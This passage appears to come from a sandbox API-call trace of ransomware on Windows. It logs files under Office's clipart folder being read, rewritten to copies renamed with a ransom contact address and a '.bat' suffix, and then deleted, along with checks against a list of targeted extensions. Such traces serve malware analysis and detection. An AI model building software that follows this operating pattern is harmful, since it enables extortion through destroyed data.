Office\\root\\CLIPART\\PUB60COR\\J0152602.WMF") returned 68 [0196.364] lstrlenW (lpString=".1cd") returned 4 [0196.364] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0196.364] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152602.WMF") returned 68 [0196.364] lstrlenW (lpString=".jpg") returned 4 [0196.364] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0196.365] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.365] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.365] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152606.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152606.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0 [0196.366] GetLastError () returned 0x0 [0196.366] ReadFile (in: hFile=0x37c, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x40f8, lpOverlapped=0x0) returned 1 [0196.368] WriteFile (in: hFile=0x3a0, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0x4100, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0x4100, lpOverlapped=0x0) returned 1 [0196.370] ReadFile (in: hFile=0x37c, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x0, lpOverlapped=0x0) returned 1 [0196.370] WriteFile (in: hFile=0x3a0, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xec, lpOverlapped=0x0) returned 1 [0196.370] SetEndOfFile (hFile=0x3a0) returned 1 [0196.370] CloseHandle (hObject=0x3a0) returned 1 [0196.370] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.370] SetEndOfFile (hFile=0x37c) returned 1 [0196.371] CloseHandle (hObject=0x37c) returned 1 [0196.372] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152606.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0196.372] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152606.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152606.wmf")) returned 1 [0196.373] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152606.WMF") returned 68 [0196.373] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152606.WMF") returned 68 [0196.373] lstrlenW (lpString=".doc") returned 4 [0196.373] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0196.373] lstrlenW (lpString=".docx") returned 5 [0196.373] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1 [0196.373] lstrlenW (lpString=".pdf") returned 4 [0196.373] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0196.373] lstrlenW (lpString=".xls") returned 4 [0196.373] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0196.373] lstrlenW (lpString=".xlsx") returned 5 [0196.373] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1 [0196.373] lstrlenW (lpString=".ppt") returned 4 [0196.373] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0196.373] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152606.WMF") returned 68 [0196.373] lstrlenW (lpString=".zip") returned 4 [0196.373] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0196.373] lstrlenW (lpString=".rar") returned 4 [0196.373] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0196.373] lstrlenW (lpString=".bz2") returned 4 [0196.373] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0196.373] lstrlenW (lpString=".7z") returned 3 [0196.373] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0196.373] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152606.WMF") returned 68 [0196.373] lstrlenW (lpString=".dbf") returned 4 [0196.373] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0196.374] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152606.WMF") returned 68 [0196.374] lstrlenW (lpString=".1cd") returned 4 [0196.374] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0196.374] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152606.WMF") returned 68 [0196.374] lstrlenW (lpString=".jpg") returned 4 [0196.374] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0196.611] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.611] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.611] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152608.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152608.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4 [0196.611] GetLastError () returned 0x0 [0196.611] ReadFile (in: hFile=0x368, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x3094, lpOverlapped=0x0) returned 1 [0196.613] WriteFile (in: hFile=0x3a4, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0x30a0, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0x30a0, lpOverlapped=0x0) returned 1 [0196.614] ReadFile (in: hFile=0x368, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x0, lpOverlapped=0x0) returned 1 [0196.614] WriteFile (in: hFile=0x3a4, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xec, lpOverlapped=0x0) returned 1 [0196.614] SetEndOfFile (hFile=0x3a4) returned 1 [0196.614] CloseHandle (hObject=0x3a4) returned 1 [0196.615] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.615] SetEndOfFile (hFile=0x368) returned 1 [0196.615] CloseHandle (hObject=0x368) returned 1 [0196.615] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152608.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0196.616] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152608.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152608.wmf")) returned 1 [0196.616] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152608.WMF") returned 68 [0196.616] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152608.WMF") returned 68 [0196.616] lstrlenW (lpString=".doc") returned 4 [0196.616] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0196.616] lstrlenW (lpString=".docx") returned 5 [0196.616] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0196.616] lstrlenW (lpString=".pdf") returned 4 [0196.616] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0196.616] lstrlenW (lpString=".xls") returned 4 [0196.616] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0196.616] lstrlenW (lpString=".xlsx") returned 5 [0196.616] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0196.616] lstrlenW (lpString=".ppt") returned 4 [0196.617] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0196.617] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152608.WMF") returned 68 [0196.617] lstrlenW (lpString=".zip") returned 4 [0196.617] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0196.617] lstrlenW (lpString=".rar") returned 4 [0196.617] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0196.617] lstrlenW (lpString=".bz2") returned 4 [0196.617] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0196.617] lstrlenW (lpString=".7z") returned 3 [0196.617] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0196.617] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152608.WMF") returned 68 [0196.617] lstrlenW (lpString=".dbf") returned 4 [0196.617] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0196.617] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152608.WMF") returned 68 [0196.617] lstrlenW (lpString=".1cd") returned 4 [0196.617] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0196.617] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152608.WMF") returned 68 [0196.617] lstrlenW (lpString=".jpg") returned 4 [0196.617] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0196.617] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.617] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.617] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152722.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152722.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4 [0196.618] GetLastError () returned 0x0 [0196.618] ReadFile (in: hFile=0x368, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x1b6c, lpOverlapped=0x0) returned 1 [0196.619] WriteFile (in: hFile=0x3a4, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0x1b70, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0x1b70, lpOverlapped=0x0) returned 1 [0196.620] ReadFile (in: hFile=0x368, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x0, lpOverlapped=0x0) returned 1 [0196.620] WriteFile (in: hFile=0x3a4, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xec, lpOverlapped=0x0) returned 1 [0196.620] SetEndOfFile (hFile=0x3a4) returned 1 [0196.620] CloseHandle (hObject=0x3a4) returned 1 [0196.620] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.621] SetEndOfFile (hFile=0x368) returned 1 [0196.621] CloseHandle (hObject=0x368) returned 1 [0196.621] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152722.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0196.622] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152722.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152722.wmf")) returned 1 [0196.622] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152722.WMF") returned 68 [0196.622] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152722.WMF") returned 68 [0196.622] lstrlenW (lpString=".doc") returned 4 [0196.622] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0196.622] lstrlenW (lpString=".docx") returned 5 [0196.622] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0196.622] lstrlenW (lpString=".pdf") returned 4 [0196.622] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0196.622] lstrlenW (lpString=".xls") returned 4 [0196.622] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0196.622] lstrlenW (lpString=".xlsx") returned 5 [0196.622] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0196.622] lstrlenW (lpString=".ppt") returned 4 [0196.622] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0196.622] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152722.WMF") returned 68 [0196.622] lstrlenW (lpString=".zip") returned 4 [0196.622] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0196.622] lstrlenW (lpString=".rar") returned 4 [0196.623] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0196.623] lstrlenW (lpString=".bz2") returned 4 [0196.623] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0196.623] lstrlenW (lpString=".7z") returned 3 [0196.623] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0196.623] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152722.WMF") returned 68 [0196.623] lstrlenW (lpString=".dbf") returned 4 [0196.623] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0196.623] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152722.WMF") returned 68 [0196.623] lstrlenW (lpString=".1cd") returned 4 [0196.623] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0196.623] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152722.WMF") returned 68 [0196.623] lstrlenW (lpString=".jpg") returned 4 [0196.623] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0196.623] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.623] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.623] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152876.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152876.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4 [0196.624] GetLastError () returned 0x0 [0196.624] ReadFile (in: hFile=0x368, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x1ec4, lpOverlapped=0x0) returned 1 [0196.625] WriteFile (in: hFile=0x3a4, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0x1ed0, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0x1ed0, lpOverlapped=0x0) returned 1 [0196.626] ReadFile (in: hFile=0x368, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x0, lpOverlapped=0x0) returned 1 [0196.626] WriteFile (in: hFile=0x3a4, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xec, lpOverlapped=0x0) returned 1 [0196.626] SetEndOfFile (hFile=0x3a4) returned 1 [0196.627] CloseHandle (hObject=0x3a4) returned 1 [0196.627] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.627] SetEndOfFile (hFile=0x368) returned 1 [0196.628] CloseHandle (hObject=0x368) returned 1 [0196.628] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152876.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0196.628] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152876.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152876.wmf")) returned 1 [0196.628] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152876.WMF") returned 68 [0196.628] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152876.WMF") returned 68 [0196.628] lstrlenW (lpString=".doc") returned 4 [0196.629] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0196.629] lstrlenW (lpString=".docx") returned 5 [0196.629] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1 [0196.629] lstrlenW (lpString=".pdf") returned 4 [0196.629] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0196.629] lstrlenW (lpString=".xls") returned 4 [0196.629] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0196.629] lstrlenW (lpString=".xlsx") returned 5 [0196.629] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1 [0196.629] lstrlenW (lpString=".ppt") returned 4 [0196.629] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0196.629] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152876.WMF") returned 68 [0196.629] lstrlenW (lpString=".zip") returned 4 [0196.629] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0196.629] lstrlenW (lpString=".rar") returned 4 [0196.629] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0196.629] lstrlenW (lpString=".bz2") returned 4 [0196.629] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0196.629] lstrlenW (lpString=".7z") returned 3 [0196.629] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0196.629] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152876.WMF") returned 68 [0196.629] lstrlenW (lpString=".dbf") returned 4 [0196.629] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0196.629] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152876.WMF") returned 68 [0196.629] lstrlenW (lpString=".1cd") returned 4 [0196.629] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0196.629] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152876.WMF") returned 68 [0196.629] lstrlenW (lpString=".jpg") returned 4 [0196.629] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0196.630] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.630] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.630] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152878.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152878.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4 [0196.630] GetLastError () returned 0x0 [0196.630] ReadFile (in: hFile=0x368, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x3a28, lpOverlapped=0x0) returned 1 [0196.632] WriteFile (in: hFile=0x3a4, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0x3a30, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0x3a30, lpOverlapped=0x0) returned 1 [0196.633] ReadFile (in: hFile=0x368, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x0, lpOverlapped=0x0) returned 1 [0196.633] WriteFile (in: hFile=0x3a4, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xec, lpOverlapped=0x0) returned 1 [0196.633] SetEndOfFile (hFile=0x3a4) returned 1 [0196.633] CloseHandle (hObject=0x3a4) returned 1 [0196.634] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.634] SetEndOfFile (hFile=0x368) returned 1 [0196.634] CloseHandle (hObject=0x368) returned 1 [0196.634] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152878.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0196.635] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152878.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152878.wmf")) returned 1 [0196.635] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152878.WMF") returned 68 [0196.635] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152878.WMF") returned 68 [0196.636] lstrlenW (lpString=".doc") returned 4 [0196.636] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0196.636] lstrlenW (lpString=".docx") returned 5 [0196.636] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0196.636] lstrlenW (lpString=".pdf") returned 4 [0196.636] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0196.636] lstrlenW (lpString=".xls") returned 4 [0196.636] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0196.636] lstrlenW (lpString=".xlsx") returned 5 [0196.636] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0196.636] lstrlenW (lpString=".ppt") returned 4 [0196.636] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0196.636] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152878.WMF") returned 68 [0196.636] lstrlenW (lpString=".zip") returned 4 [0196.636] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0196.636] lstrlenW (lpString=".rar") returned 4 [0196.636] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0196.636] lstrlenW (lpString=".bz2") returned 4 [0196.636] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0196.636] lstrlenW (lpString=".7z") returned 3 [0196.636] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0196.636] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152878.WMF") returned 68 [0196.636] lstrlenW (lpString=".dbf") returned 4 [0196.636] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0196.636] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152878.WMF") returned 68 [0196.636] lstrlenW (lpString=".1cd") returned 4 [0196.636] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0196.637] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152878.WMF") returned 68 [0196.637] lstrlenW (lpString=".jpg") returned 4 [0196.637] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0196.637] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.637] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.637] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152882.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152882.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4 [0196.638] GetLastError () returned 0x0 [0196.638] ReadFile (in: hFile=0x368, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x2370, lpOverlapped=0x0) returned 1 [0196.643] WriteFile (in: hFile=0x3a4, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0x2380, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0x2380, lpOverlapped=0x0) returned 1 [0196.644] ReadFile (in: hFile=0x368, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x0, lpOverlapped=0x0) returned 1 [0196.645] WriteFile (in: hFile=0x3a4, lpBuffer=0x3d12020*, 